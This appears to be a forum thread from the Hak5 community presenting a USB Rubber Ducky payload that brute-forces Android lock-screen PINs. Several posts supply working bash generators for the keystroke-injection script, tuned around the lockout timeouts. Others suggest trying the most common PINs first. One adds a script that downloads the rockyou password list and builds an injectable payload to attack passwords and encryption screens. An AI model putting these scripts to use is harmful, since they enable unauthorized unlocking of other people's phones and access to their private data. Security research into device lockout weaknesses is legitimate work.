Jump to content

[Payload] Android Brute Force 4-digit pin


Recommended Posts

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

  • Upvote 7
Link to comment
Share on other sites

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

  • Upvote 1
Link to comment
Share on other sites

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev teensy, I was one of the lucky ones.) next week when I get paid... along with other hakshop goodies :D.

Link to comment
Share on other sites

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec

ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$

/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE

R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*

Volume in drive C has no label.

Volume Serial Number is 2499-C7D7

Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt

08/30/2012 08:00 PM 50 Android SDK Path.txt

12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt

3 File(s) 278 bytes

0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt

DELAY 5000 ; echo {0000..9999}

STRING

DELAY 1000

ENTER

ENTER

C:\Users\UserName\Desktop>

Edited by overwraith
Link to comment
Share on other sites

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed[/CODE]

then:

[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]

Not sure whats going wrong with cygwin?

Link to comment
Share on other sites

I created a script to generate pretty much the same output using only bash loops/conditions


#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
count=$((count+1))
echo "STRING $pin"
# After every other pin, do this
if [ $((count % 2)) -eq 0 ]; then
echo "DELAY 1000"
echo "ENTER"
echo "ENTER"
fi
# After 5 pins, do this
if [ $((count % 5)) -eq 0 ]; then
for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
do
echo "DELAY 5000"
echo "ENTER"
done
fi
done
[/CODE]

Link to comment
Share on other sites

You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.

Most common PINs would be any combinations with all same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try thous first then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't wan't to remember more than two numbers.

Just my two cents.

  • Like 1
  • Upvote 3
Link to comment
Share on other sites

It is kind of odd they didn't lock down the device after a certain number of tries as pattern lock does that after 20 tries.

And once it gets locked down you'll need your gmail password to unlock. (Which also sort of fails as well cause reboot resets the counter)

Edited by Kag
Link to comment
Share on other sites

Hello everybody,

I must say that I am surprised that noone (only Totu) suggested to use a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to bruteforce your way into a device with PIN you should really use that list, instead of a generated one.

Here is the study?

http://www.datagenet...september32012/

and here are the first 10 pins I would try:

1234

1111

0000

1212

7777

1004

2000

4444

2222

6969

1 in 4 chance of hacking the device in under a minute!

What do you say?

Edited by iamnoxtras
  • Upvote 1
Link to comment
Share on other sites

Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.

** Edit **

Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.


#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
echo "Sorry, you need super user access to run this script."
exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
else
echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
else
echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
else
echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
PATH=$PATH:$wgetdir
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
[/CODE]

Edited by CaptainHooligan
  • Upvote 1
Link to comment
Share on other sites

  • 2 weeks later...

Will it continue to go deep into the brute forcing even with a different pin lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of touchwiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout?

Link to comment
Share on other sites

Hi All,

I have a Motorla ME863 cell phone and after a few xmas drinks was a pratt and changed my 4 digit number pass code ....and yup you guessed it ...promptly forgot the damm thing.

Is there anyone in the UK southeast / Berks/Bucks/ London area that can help me fix without having to do a factory reset ?

Many thanks in advance for all and any help

Rgds

JD

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...